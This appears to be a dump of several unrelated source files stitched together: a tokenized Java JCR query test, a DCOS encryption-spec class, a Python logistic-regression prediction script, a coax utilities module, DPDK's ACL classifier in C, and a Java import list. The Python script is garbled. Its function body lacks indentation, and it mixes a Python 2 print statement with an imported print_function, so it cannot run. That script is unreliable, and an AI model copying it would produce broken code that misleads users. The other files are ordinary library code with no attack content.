name|assertContainsQuery
parameter_list|(
name|String
name|statement
parameter_list|,
name|boolean
name|match
parameter_list|)
throws|throws
name|InvalidQueryException
throws|,
name|RepositoryException
block|{
name|StringBuffer
name|stmt
init|=
operator|new
name|StringBuffer
argument_list|()
decl_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"/jcr:root"
argument_list|)
operator|.
name|append
argument_list|(
name|testRoot
argument_list|)
operator|.
name|append
argument_list|(
literal|"/*"
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"[jcr:contains(., '"
argument_list|)
operator|.
name|append
argument_list|(
name|statement
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"')]"
argument_list|)
expr_stmt|;
name|Query
name|q
init|=
name|qm
operator|.
name|createQuery
argument_list|(
name|stmt
operator|.
name|toString
argument_list|()
argument_list|,
name|Query
operator|.
name|XPATH
argument_list|)
decl_stmt|;
name|checkResult
argument_list|(
name|q
operator|.
name|execute
argument_list|()
argument_list|,
name|match
condition|?
literal|1
else|:
literal|0
argument_list|)
expr_stmt|;
name|stmt
operator|=
operator|new
name|StringBuffer
argument_list|()
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"SELECT * FROM nt:base "
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"WHERE jcr:path LIKE '"
argument_list|)
operator|.
name|append
argument_list|(
name|testRoot
argument_list|)
operator|.
name|append
argument_list|(
literal|"/%' "
argument_list|)
expr_stmt|;
name|stmt
operator|.
name|append
argument_list|(
literal|"AND CONTAINS(., '"
argument_list|)
operator|.
name|append
argument_list|(
name|statement
argument_list|)
operator|.
name|append
argument_list|(
literal|"')"
argument_list|)
expr_stmt|;
name|q
operator|=
name|qm
operator|.
name|createQuery
argument_list|(
name|stmt
operator|.
name|toString
argument_list|()
argument_list|,
name|Query
operator|.
name|SQL
argument_list|)
expr_stmt|;
name|checkResult
argument_list|(
name|q
operator|.
name|execute
argument_list|()
argument_list|,
name|match
condition|?
literal|1
else|:
literal|0
argument_list|)
expr_stmt|;
block|}
block|}
end_class
end_unit
|
erebe/dcos-commons
|
sdk/scheduler/src/main/java/com/mesosphere/sdk/specification/DefaultTransportEncryptionSpec.java
|
<gh_stars>100-1000
package com.mesosphere.sdk.specification;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import org.apache.commons.lang3.builder.EqualsBuilder;
import org.apache.commons.lang3.builder.HashCodeBuilder;
import org.apache.commons.lang3.builder.ReflectionToStringBuilder;
/**
* Default implementation of {@link TransportEncryptionSpec}.
*/
/**
 * Default implementation of {@link TransportEncryptionSpec}.
 *
 * <p>Instances are immutable. Create them via {@link #newBuilder()}; the private
 * {@link JsonCreator} constructor is reserved for Jackson deserialization and,
 * unlike the builder path, performs no validation.
 */
public class DefaultTransportEncryptionSpec implements TransportEncryptionSpec {

    /** Name of the encryption artifact; must be non-blank when built via the builder. */
    private final String name;

    /** Kind of transport-encryption artifact requested. */
    private final Type type;

    @JsonCreator
    private DefaultTransportEncryptionSpec(
            @JsonProperty("name") String name,
            @JsonProperty("type") Type type)
    {
        this.name = name;
        this.type = type;
    }

    public DefaultTransportEncryptionSpec(Builder builder) {
        this(builder.name, builder.type);
        // Builder-constructed specs must carry a usable name.
        ValidationUtils.nonBlank(this, "name", name);
    }

    /** Returns a fresh builder for assembling a spec. */
    public static Builder newBuilder() {
        return new Builder();
    }

    @Override
    public String getName() {
        return name;
    }

    @Override
    public Type getType() {
        return type;
    }

    @Override
    public boolean equals(Object o) {
        // Identity fast-path; reflectionEquals yields the same result either way.
        return this == o || EqualsBuilder.reflectionEquals(this, o);
    }

    @Override
    public int hashCode() {
        return HashCodeBuilder.reflectionHashCode(this);
    }

    @Override
    public String toString() {
        return ReflectionToStringBuilder.toString(this);
    }

    /**
     * A {@link DefaultTransportEncryptionSpec} builder.
     */
    public static final class Builder {
        private String name;
        private Type type;

        private Builder() {
        }

        /** Sets the artifact name; required, must be non-blank at build time. */
        public Builder name(String name) {
            this.name = name;
            return this;
        }

        /** Sets the encryption artifact type. */
        public Builder type(Type type) {
            this.type = type;
            return this;
        }

        public DefaultTransportEncryptionSpec build() {
            return new DefaultTransportEncryptionSpec(this);
        }
    }
}
|
austinburks/nlp-udemy
|
machine_learning_examples/ann_logistic_extra/logistic_predict.py
|
<filename>machine_learning_examples/ann_logistic_extra/logistic_predict.py<gh_stars>0
from __future__ import print_function

import numpy as np

from process import get_binary_data
# Load the binary-class subset of the data.  NOTE(review): assumes
# get_binary_data returns (features, 0/1 labels) as numpy arrays — confirm
# against process.py.
X, Y = get_binary_data()

# randomly initialize weights
D = X.shape[1]          # input dimensionality
W = np.random.randn(D)  # untrained weights drawn from N(0, 1)
b = 0 # bias term

# make predictions
def sigmoid(a):
    """Elementwise logistic function: 1 / (1 + e^-a)."""
    return np.reciprocal(1.0 + np.exp(-a))
def forward(X, W, b):
    """Model output P(y=1 | X): logistic of the affine score X.W + b."""
    scores = X.dot(W) + b
    return sigmoid(scores)
# Forward pass with the (random, untrained) weights; round the
# probabilities at 0.5 to get hard 0/1 predictions.
P_Y_given_X = forward(X, W, b)
predictions = np.round(P_Y_given_X)

# calculate the accuracy
def classification_rate(Y, P):
return np.mean(Y == P)
print "Score:", classification_rate(Y, predictions)
|
sleepy-owl/coax
|
coax/utils/__init__.py
|
<gh_stars>0
# ------------------------------------------------------------------------------------------------ #
# MIT License #
# #
# Copyright (c) 2020, Microsoft Corporation #
# #
# Permission is hereby granted, free of charge, to any person obtaining a copy of this software #
# and associated documentation files (the "Software"), to deal in the Software without #
# restriction, including without limitation the rights to use, copy, modify, merge, publish, #
# distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the #
# Software is furnished to do so, subject to the following conditions: #
# #
# The above copyright notice and this permission notice shall be included in all copies or #
# substantial portions of the Software. #
# #
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING #
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND #
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, #
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, #
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. #
# ------------------------------------------------------------------------------------------------ #
r"""
Utilities
=========
This is a collection of utility (helper) functions used throughout the package.
Object Reference
----------------
.. autosummary::
:nosignatures:
coax.utils.OrnsteinUhlenbeckNoise
coax.utils.StepwiseLinearFunction
coax.utils.SegmentTree
coax.utils.SumTree
coax.utils.MinTree
coax.utils.MaxTree
coax.utils.argmax
coax.utils.argmin
coax.utils.batch_to_single
coax.utils.check_array
coax.utils.check_preprocessors
coax.utils.clipped_logit
coax.utils.default_preprocessor
coax.utils.diff_transform
coax.utils.diff_transform_matrix
coax.utils.docstring
coax.utils.double_relu
coax.utils.dump
coax.utils.dumps
coax.utils.enable_logging
coax.utils.generate_gif
coax.utils.get_env_attr
coax.utils.get_grads_diagnostics
coax.utils.get_magnitude_quantiles
coax.utils.get_transition_batch
coax.utils.has_env_attr
coax.utils.idx
coax.utils.is_policy
coax.utils.is_qfunction
coax.utils.is_reward_function
coax.utils.is_stochastic
coax.utils.is_transition_model
coax.utils.is_vfunction
coax.utils.isscalar
coax.utils.jit
coax.utils.load
coax.utils.loads
coax.utils.merge_dicts
coax.utils.pretty_print
coax.utils.pretty_repr
coax.utils.reload_recursive
coax.utils.render_episode
coax.utils.safe_sample
coax.utils.single_to_batch
coax.utils.tree_ravel
"""
from ._action_noise import OrnsteinUhlenbeckNoise
from ._array import (
StepwiseLinearFunction,
argmax,
argmin,
batch_to_single,
check_array,
check_preprocessors,
chunks_pow2,
clipped_logit,
default_preprocessor,
diff_transform,
diff_transform_matrix,
double_relu,
get_grads_diagnostics,
get_magnitude_quantiles,
get_transition_batch,
idx,
isscalar,
merge_dicts,
safe_sample,
single_to_batch,
tree_ravel,
)
from ._jit import jit
from ._misc import (
docstring,
dump,
dumps,
enable_logging,
generate_gif,
get_env_attr,
has_env_attr,
is_policy,
is_qfunction,
is_reward_function,
is_stochastic,
is_transition_model,
is_vfunction,
load,
loads,
pretty_print,
pretty_repr,
reload_recursive,
render_episode,
)
from ._segment_tree import SegmentTree, SumTree, MinTree, MaxTree
__all__ = (
'StepwiseLinearFunction',
'OrnsteinUhlenbeckNoise',
'SegmentTree',
'SumTree',
'MinTree',
'MaxTree',
'argmax',
'argmin',
'batch_to_single',
'check_array',
'check_preprocessors',
'chunks_pow2',
'clipped_logit',
'default_preprocessor',
'diff_transform',
'diff_transform_matrix',
'docstring',
'double_relu',
'dump',
'dumps',
'enable_logging',
'generate_gif',
'get_env_attr',
'get_grads_diagnostics',
'get_magnitude_quantiles',
'get_transition_batch',
'has_env_attr',
'idx',
'is_policy',
'is_qfunction',
'is_reward_function',
'is_stochastic',
'is_transition_model',
'is_vfunction',
'isscalar',
'jit',
'load',
'loads',
'merge_dicts',
'pretty_print',
'pretty_repr',
'reload_recursive',
'render_episode',
'safe_sample',
'single_to_batch',
'tree_ravel',
)
|
ajitkhaparde/trex-core
|
src/dpdk/lib/librte_acl/rte_acl.c
|
<reponame>ajitkhaparde/trex-core
/* SPDX-License-Identifier: BSD-3-Clause
* Copyright(c) 2010-2014 Intel Corporation
*/
#include <rte_eal_memconfig.h>
#include <rte_string_fns.h>
#include <rte_acl.h>
#include <rte_tailq.h>
#include <rte_vect.h>
#include "acl.h"
TAILQ_HEAD(rte_acl_list, rte_tailq_entry);
static struct rte_tailq_elem rte_acl_tailq = {
.name = "RTE_ACL",
};
EAL_REGISTER_TAILQ(rte_acl_tailq)
#ifndef CC_AVX512_SUPPORT
/*
 * If the compiler doesn't support AVX512 instructions,
 * then the dummy one would be used instead for AVX512 classify method.
 * The stubs keep the classify_fns[] dispatch table fully populated on
 * every build; calling them reports -ENOTSUP at run time.
 */
int
rte_acl_classify_avx512x16(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}

int
rte_acl_classify_avx512x32(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}
#endif

#ifndef CC_AVX2_SUPPORT
/*
 * If the compiler doesn't support AVX2 instructions,
 * then the dummy one would be used instead for AVX2 classify method.
 */
int
rte_acl_classify_avx2(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}
#endif

#ifndef RTE_ARCH_X86
/* Dummy SSE classify stub for non-x86 builds. */
int
rte_acl_classify_sse(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}
#endif

#ifndef RTE_ARCH_ARM
/* Dummy NEON classify stub for non-ARM builds. */
int
rte_acl_classify_neon(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}
#endif

#ifndef RTE_ARCH_PPC_64
/* Dummy AltiVec classify stub for non-PPC64 builds. */
int
rte_acl_classify_altivec(__rte_unused const struct rte_acl_ctx *ctx,
    __rte_unused const uint8_t **data,
    __rte_unused uint32_t *results,
    __rte_unused uint32_t num,
    __rte_unused uint32_t categories)
{
    return -ENOTSUP;
}
#endif
/*
 * Dispatch table: maps each classify algorithm id to its implementation.
 * Methods not supported by the build resolve to the -ENOTSUP stubs above,
 * so every slot is always callable.
 */
static const rte_acl_classify_t classify_fns[] = {
    [RTE_ACL_CLASSIFY_DEFAULT] = rte_acl_classify_scalar,
    [RTE_ACL_CLASSIFY_SCALAR] = rte_acl_classify_scalar,
    [RTE_ACL_CLASSIFY_SSE] = rte_acl_classify_sse,
    [RTE_ACL_CLASSIFY_AVX2] = rte_acl_classify_avx2,
    [RTE_ACL_CLASSIFY_NEON] = rte_acl_classify_neon,
    [RTE_ACL_CLASSIFY_ALTIVEC] = rte_acl_classify_altivec,
    [RTE_ACL_CLASSIFY_AVX512X16] = rte_acl_classify_avx512x16,
    [RTE_ACL_CLASSIFY_AVX512X32] = rte_acl_classify_avx512x32,
};
/*
 * Helper function for acl_check_alg.
 * Check support for ARM specific classify methods.
 * Returns 0 if supported, -ENOTSUP if not available at run time,
 * -EINVAL if alg is not an ARM method.
 */
static int
acl_check_alg_arm(enum rte_acl_classify_alg alg)
{
    if (alg == RTE_ACL_CLASSIFY_NEON) {
#if defined(RTE_ARCH_ARM64)
        /* on aarch64 NEON is always present; only SIMD width matters */
        if (rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
            return 0;
#elif defined(RTE_ARCH_ARM)
        /* on 32-bit ARM the NEON cpu flag must also be enabled */
        if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_NEON) &&
                rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
            return 0;
#endif
        return -ENOTSUP;
    }

    return -EINVAL;
}
/*
 * Helper function for acl_check_alg.
 * Check support for PPC specific classify methods.
 * Returns 0 if supported, -ENOTSUP if not available at run time,
 * -EINVAL if alg is not a PPC method.
 */
static int
acl_check_alg_ppc(enum rte_acl_classify_alg alg)
{
    if (alg == RTE_ACL_CLASSIFY_ALTIVEC) {
#if defined(RTE_ARCH_PPC_64)
        if (rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
            return 0;
#endif
        return -ENOTSUP;
    }

    return -EINVAL;
}
#ifdef CC_AVX512_SUPPORT
/*
 * Runtime check that all four AVX512 feature flags (F/VL/CD/BW) needed by
 * the AVX512 classify implementations are present on this cpu.
 */
static int
acl_check_avx512_cpu_flags(void)
{
    return (rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512F) &&
        rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512VL) &&
        rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512CD) &&
        rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX512BW));
}
#endif
/*
 * Helper function for acl_check_alg.
 * Check support for x86 specific classify methods.
 * Each method needs both a build-time (#ifdef) and a run-time
 * (cpu flag + SIMD bitwidth) capability to be usable.
 * Returns 0 if supported, -ENOTSUP otherwise, -EINVAL if alg is not
 * an x86 method.
 */
static int
acl_check_alg_x86(enum rte_acl_classify_alg alg)
{
    if (alg == RTE_ACL_CLASSIFY_AVX512X32) {
#ifdef CC_AVX512_SUPPORT
        /* needs full 512-bit SIMD allowance */
        if (acl_check_avx512_cpu_flags() != 0 &&
                rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_512)
            return 0;
#endif
        return -ENOTSUP;
    }

    if (alg == RTE_ACL_CLASSIFY_AVX512X16) {
#ifdef CC_AVX512_SUPPORT
        /* runs fine with 256-bit SIMD allowance */
        if (acl_check_avx512_cpu_flags() != 0 &&
                rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_256)
            return 0;
#endif
        return -ENOTSUP;
    }

    if (alg == RTE_ACL_CLASSIFY_AVX2) {
#ifdef CC_AVX2_SUPPORT
        if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_AVX2) &&
                rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_256)
            return 0;
#endif
        return -ENOTSUP;
    }

    if (alg == RTE_ACL_CLASSIFY_SSE) {
#ifdef RTE_ARCH_X86
        if (rte_cpu_get_flag_enabled(RTE_CPUFLAG_SSE4_1) &&
                rte_vect_get_max_simd_bitwidth() >= RTE_VECT_SIMD_128)
            return 0;
#endif
        return -ENOTSUP;
    }

    return -EINVAL;
}
/*
 * Check if input alg is supported by given platform/binary.
 * Note that both conditions should be met:
 * - at build time compiler supports ISA used by given methods
 * - at run time target cpu supports necessary ISA.
 * Returns 0 on success, -ENOTSUP/-EINVAL otherwise.
 */
static int
acl_check_alg(enum rte_acl_classify_alg alg)
{
    /* ARM-specific method */
    if (alg == RTE_ACL_CLASSIFY_NEON)
        return acl_check_alg_arm(alg);

    /* PPC-specific method */
    if (alg == RTE_ACL_CLASSIFY_ALTIVEC)
        return acl_check_alg_ppc(alg);

    /* x86-specific methods */
    if (alg == RTE_ACL_CLASSIFY_AVX512X32 ||
            alg == RTE_ACL_CLASSIFY_AVX512X16 ||
            alg == RTE_ACL_CLASSIFY_AVX2 ||
            alg == RTE_ACL_CLASSIFY_SSE)
        return acl_check_alg_x86(alg);

    /* scalar method is supported on all platforms */
    if (alg == RTE_ACL_CLASSIFY_SCALAR)
        return 0;

    return -EINVAL;
}
/*
 * Get preferred alg for given platform.
 * Walks the per-platform preference list and returns the first method
 * that passes the build-time and run-time support checks.
 */
static enum rte_acl_classify_alg
acl_get_best_alg(void)
{
    /*
     * array of supported methods for each platform.
     * Note that order is important - from most to less preferable.
     */
    static const enum rte_acl_classify_alg alg[] = {
#if defined(RTE_ARCH_ARM)
        RTE_ACL_CLASSIFY_NEON,
#elif defined(RTE_ARCH_PPC_64)
        RTE_ACL_CLASSIFY_ALTIVEC,
#elif defined(RTE_ARCH_X86)
        RTE_ACL_CLASSIFY_AVX512X32,
        RTE_ACL_CLASSIFY_AVX512X16,
        RTE_ACL_CLASSIFY_AVX2,
        RTE_ACL_CLASSIFY_SSE,
#endif
        /* scalar is always last: works everywhere */
        RTE_ACL_CLASSIFY_SCALAR,
    };

    uint32_t i;

    /* find best possible alg */
    for (i = 0; i != RTE_DIM(alg) && acl_check_alg(alg[i]) != 0; i++)
        ;

    /* we always have to find something suitable */
    RTE_VERIFY(i != RTE_DIM(alg));
    return alg[i];
}
/*
 * Override the classify method for a given context.
 * RTE_ACL_CLASSIFY_DEFAULT selects the best method available on this
 * platform; any other value is validated against build-time and
 * run-time support before being stored.
 * Returns 0 on success, negative errno-style value otherwise.
 */
extern int
rte_acl_set_ctx_classify(struct rte_acl_ctx *ctx, enum rte_acl_classify_alg alg)
{
    int32_t rc;

    /* formal parameters check */
    if (ctx == NULL || (uint32_t)alg >= RTE_DIM(classify_fns))
        return -EINVAL;

    /* user asked us to select the *best* one */
    if (alg == RTE_ACL_CLASSIFY_DEFAULT)
        alg = acl_get_best_alg();

    /* check that given alg is supported */
    rc = acl_check_alg(alg);
    if (rc != 0)
        return rc;

    ctx->alg = alg;
    return 0;
}
/*
 * Classify a burst of packets using an explicitly selected algorithm.
 * Returns 0 on success, -EINVAL on invalid parameters.
 */
int
rte_acl_classify_alg(const struct rte_acl_ctx *ctx, const uint8_t **data,
    uint32_t *results, uint32_t num, uint32_t categories,
    enum rte_acl_classify_alg alg)
{
    /*
     * Reject an out-of-range alg before indexing the dispatch table:
     * alg comes straight from the caller, and an invalid value would
     * otherwise dereference a garbage function pointer.
     */
    if ((uint32_t)alg >= RTE_DIM(classify_fns))
        return -EINVAL;

    /* categories must be 1 or a multiple of RTE_ACL_RESULTS_MULTIPLIER */
    if (categories != 1 &&
            ((RTE_ACL_RESULTS_MULTIPLIER - 1) & categories) != 0)
        return -EINVAL;

    return classify_fns[alg](ctx, data, results, num, categories);
}
/*
 * Classify using the algorithm previously chosen for this context
 * (set at creation time or via rte_acl_set_ctx_classify()).
 */
int
rte_acl_classify(const struct rte_acl_ctx *ctx, const uint8_t **data,
    uint32_t *results, uint32_t num, uint32_t categories)
{
    return rte_acl_classify_alg(ctx, data, results, num, categories,
        ctx->alg);
}
/*
 * Look up an ACL context by name in the global tailq.
 * Returns the context, or NULL (with rte_errno = ENOENT) if no context
 * with that name is registered.
 */
struct rte_acl_ctx *
rte_acl_find_existing(const char *name)
{
    struct rte_acl_ctx *ctx = NULL;
    struct rte_acl_list *acl_list;
    struct rte_tailq_entry *te;

    acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);

    /* read-lock the shared tailq while scanning it */
    rte_mcfg_tailq_read_lock();
    TAILQ_FOREACH(te, acl_list, next) {
        ctx = (struct rte_acl_ctx *) te->data;
        if (strncmp(name, ctx->name, sizeof(ctx->name)) == 0)
            break;
    }
    rte_mcfg_tailq_read_unlock();

    if (te == NULL) {
        rte_errno = ENOENT;
        return NULL;
    }
    return ctx;
}
/*
 * Deregister the context from the global tailq and release its memory
 * (run-time structures, the context itself and its tailq entry).
 * Safe to call with NULL.
 */
void
rte_acl_free(struct rte_acl_ctx *ctx)
{
    struct rte_acl_list *acl_list;
    struct rte_tailq_entry *te;

    if (ctx == NULL)
        return;

    acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);

    rte_mcfg_tailq_write_lock();

    /* find our tailq entry */
    TAILQ_FOREACH(te, acl_list, next) {
        if (te->data == (void *) ctx)
            break;
    }
    if (te == NULL) {
        /* not registered: nothing to free */
        rte_mcfg_tailq_write_unlock();
        return;
    }

    TAILQ_REMOVE(acl_list, te, next);

    rte_mcfg_tailq_write_unlock();

    /* ctx->mem holds the build-time (RT) structures */
    rte_free(ctx->mem);
    rte_free(ctx);
    rte_free(te);
}
/*
 * Create a named ACL context on the given socket, with rule storage for
 * up to param->max_rule_num rules allocated up front.
 * If a context with the same name already exists, that context is
 * returned instead of creating a new one.
 * Returns NULL on failure (rte_errno = EINVAL for bad parameters).
 */
struct rte_acl_ctx *
rte_acl_create(const struct rte_acl_param *param)
{
    size_t sz;
    struct rte_acl_ctx *ctx;
    struct rte_acl_list *acl_list;
    struct rte_tailq_entry *te;
    char name[sizeof(ctx->name)];

    acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);

    /* check that input parameters are valid. */
    if (param == NULL || param->name == NULL) {
        rte_errno = EINVAL;
        return NULL;
    }

    snprintf(name, sizeof(name), "ACL_%s", param->name);

    /* calculate amount of memory required for pattern set. */
    sz = sizeof(*ctx) + param->max_rule_num * param->rule_size;

    /* get EAL TAILQ lock. */
    rte_mcfg_tailq_write_lock();

    /* if we already have one with that name */
    TAILQ_FOREACH(te, acl_list, next) {
        ctx = (struct rte_acl_ctx *) te->data;
        if (strncmp(param->name, ctx->name, sizeof(ctx->name)) == 0)
            break;
    }

    /* if ACL with such name doesn't exist, then create a new one. */
    if (te == NULL) {
        ctx = NULL;
        te = rte_zmalloc("ACL_TAILQ_ENTRY", sizeof(*te), 0);

        if (te == NULL) {
            RTE_LOG(ERR, ACL, "Cannot allocate tailq entry!\n");
            goto exit;
        }

        ctx = rte_zmalloc_socket(name, sz, RTE_CACHE_LINE_SIZE, param->socket_id);

        if (ctx == NULL) {
            RTE_LOG(ERR, ACL,
                "allocation of %zu bytes on socket %d for %s failed\n",
                sz, param->socket_id, name);
            rte_free(te);
            goto exit;
        }
        /* init new allocated context. */
        /* rule storage lives immediately after the context struct */
        ctx->rules = ctx + 1;
        ctx->max_rules = param->max_rule_num;
        ctx->rule_sz = param->rule_size;
        ctx->socket_id = param->socket_id;
        ctx->alg = acl_get_best_alg();
        strlcpy(ctx->name, param->name, sizeof(ctx->name));

        te->data = (void *) ctx;

        TAILQ_INSERT_TAIL(acl_list, te, next);
    }

exit:
    rte_mcfg_tailq_write_unlock();
    return ctx;
}
/*
 * Append 'num' rules (each ctx->rule_sz bytes) to the context's rule
 * storage. Rules are assumed to be pre-validated by the caller.
 * Returns 0 on success, -ENOMEM if the table lacks enough free slots.
 */
static int
acl_add_rules(struct rte_acl_ctx *ctx, const void *rules, uint32_t num)
{
    uint8_t *pos;

    /*
     * Overflow-safe capacity check: the previous form
     * 'num + ctx->num_rules > ctx->max_rules' could wrap around for a
     * very large 'num' and falsely pass. num_rules <= max_rules always
     * holds, so the subtraction below cannot underflow.
     */
    if (num > ctx->max_rules - ctx->num_rules)
        return -ENOMEM;

    /* copy the new rules right after the last stored rule */
    pos = ctx->rules;
    pos += ctx->rule_sz * ctx->num_rules;
    memcpy(pos, rules, num * ctx->rule_sz);
    ctx->num_rules += num;

    return 0;
}
/*
 * Sanity-check a single rule: at least one valid category bit must be
 * set, and the priority must lie within
 * [RTE_ACL_MIN_PRIORITY, RTE_ACL_MAX_PRIORITY].
 * Returns 0 when the rule is valid, -EINVAL otherwise.
 */
static int
acl_check_rule(const struct rte_acl_rule_data *rd)
{
    if ((RTE_LEN2MASK(RTE_ACL_MAX_CATEGORIES, typeof(rd->category_mask)) &
            rd->category_mask) == 0 ||
            rd->priority > RTE_ACL_MAX_PRIORITY ||
            rd->priority < RTE_ACL_MIN_PRIORITY)
        return -EINVAL;
    return 0;
}
/*
 * Validate and append an array of rules to the context.
 * All rules are checked before any is stored, so on error the context
 * is left unmodified.
 * Returns 0 on success, -EINVAL on an invalid rule or parameters,
 * -ENOMEM when the rule table is full.
 */
int
rte_acl_add_rules(struct rte_acl_ctx *ctx, const struct rte_acl_rule *rules,
    uint32_t num)
{
    const struct rte_acl_rule *rv;
    uint32_t i;
    int32_t rc;

    if (ctx == NULL || rules == NULL || 0 == ctx->rule_sz)
        return -EINVAL;

    /* validate every rule first; rule size is ctx-specific */
    for (i = 0; i != num; i++) {
        rv = (const struct rte_acl_rule *)
            ((uintptr_t)rules + i * ctx->rule_sz);
        rc = acl_check_rule(&rv->data);
        if (rc != 0) {
            RTE_LOG(ERR, ACL, "%s(%s): rule #%u is invalid\n",
                __func__, ctx->name, i + 1);
            return rc;
        }
    }

    return acl_add_rules(ctx, rules, num);
}
/*
 * Reset all rules.
 * Note that RT structures are not affected.
 */
void
rte_acl_reset_rules(struct rte_acl_ctx *ctx)
{
    if (ctx == NULL)
        return;

    ctx->num_rules = 0;
}
/*
 * Reset all rules and destroys RT structures.
 * Rebuilding with the stored config and zero rules effectively tears
 * down the existing run-time tries.
 */
void
rte_acl_reset(struct rte_acl_ctx *ctx)
{
    if (ctx != NULL) {
        rte_acl_reset_rules(ctx);
        rte_acl_build(ctx, &ctx->config);
    }
}
/*
 * Dump ACL context to the stdout.
 * No-op when ctx is NULL.
 */
void
rte_acl_dump(const struct rte_acl_ctx *ctx)
{
    if (!ctx)
        return;
    printf("acl context <%s>@%p\n", ctx->name, ctx);
    printf("  socket_id=%"PRId32"\n", ctx->socket_id);
    printf("  alg=%"PRId32"\n", ctx->alg);
    printf("  first_load_sz=%"PRIu32"\n", ctx->first_load_sz);
    printf("  max_rules=%"PRIu32"\n", ctx->max_rules);
    printf("  rule_size=%"PRIu32"\n", ctx->rule_sz);
    printf("  num_rules=%"PRIu32"\n", ctx->num_rules);
    printf("  num_categories=%"PRIu32"\n", ctx->num_categories);
    printf("  num_tries=%"PRIu32"\n", ctx->num_tries);
}
/*
 * Dump all ACL contexts to the stdout.
 * Holds the tailq read lock while walking the global list.
 */
void
rte_acl_list_dump(void)
{
    struct rte_acl_ctx *ctx;
    struct rte_acl_list *acl_list;
    struct rte_tailq_entry *te;

    acl_list = RTE_TAILQ_CAST(rte_acl_tailq.head, rte_acl_list);

    rte_mcfg_tailq_read_lock();
    TAILQ_FOREACH(te, acl_list, next) {
        ctx = (struct rte_acl_ctx *) te->data;
        rte_acl_dump(ctx);
    }
    rte_mcfg_tailq_read_unlock();
}
|
gavinbaker999/Java-Framework-Apps
|
ehscontrols/src/CollapsibleEditorKit.java
|
import java.applet.*;
import java.awt.*;
import java.awt.event.*;
import java.awt.image.*;
import java.awt.font.*;
import java.awt.color.*; // ColorSpace
import java.awt.geom.*; // AffineTransform
import java.sql.*;
import java.io.*;
import java.net.*;
import java.util.*;
import java.awt.List;
import java.awt.print.*;
import java.util.Date;
import java.util.Map;
import java.text.*;
import java.lang.reflect.*;
import java.beans.*;
import java.util.regex.Pattern;
import java.util.regex.Matcher;
import java.util.concurrent.*;
import javax.swing.*;
import javax.swing.event.*;
import javax.swing.border.*;
import javax.swing.tree.*;
import javax.swing.table.*;
import javax.swing.Timer;
import javax.sound.sampled.*;
import javax.xml.parsers.*;
import javax.xml.transform.*;
import javax.xml.transform.dom.*;
import javax.xml.transform.sax.*;
import javax.xml.transform.stream.*;
import javax.xml.transform.OutputKeys.*;
import org.w3c.dom.*;
import org.w3c.dom.traversal.*;
import org.xml.sax.*;
import org.xml.sax.helpers.*;
import javax.script.*;
import javax.swing.filechooser.*;
//import javax.xml.ws.*;
//import javax.xml.ws.handler.*;
//import javax.xml.ws.handler.soap.*;
//import javax.xml.soap.*;
import javax.xml.namespace.QName;
//import javax.xml.ws.handler.Handler;
//import javax.xml.messaging.*;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathConstants;
import javax.xml.xpath.XPathExpressionException;
import javax.xml.xpath.XPathFactory;
import javax.xml.stream.EventFilter;
import javax.xml.stream.StreamFilter;
import javax.xml.stream.XMLEventReader;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLReporter;
import javax.xml.stream.XMLResolver;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;
import javax.xml.stream.util.XMLEventAllocator;
import javax.xml.transform.Source;
import javax.sound.sampled.*;
//import sun.audio.*;
import javax.sound.sampled.DataLine;
import javax.sound.sampled.TargetDataLine;
import javax.sound.sampled.AudioFormat;
import javax.sound.sampled.AudioSystem;
import javax.sound.sampled.AudioInputStream;
import javax.sound.sampled.LineUnavailableException;
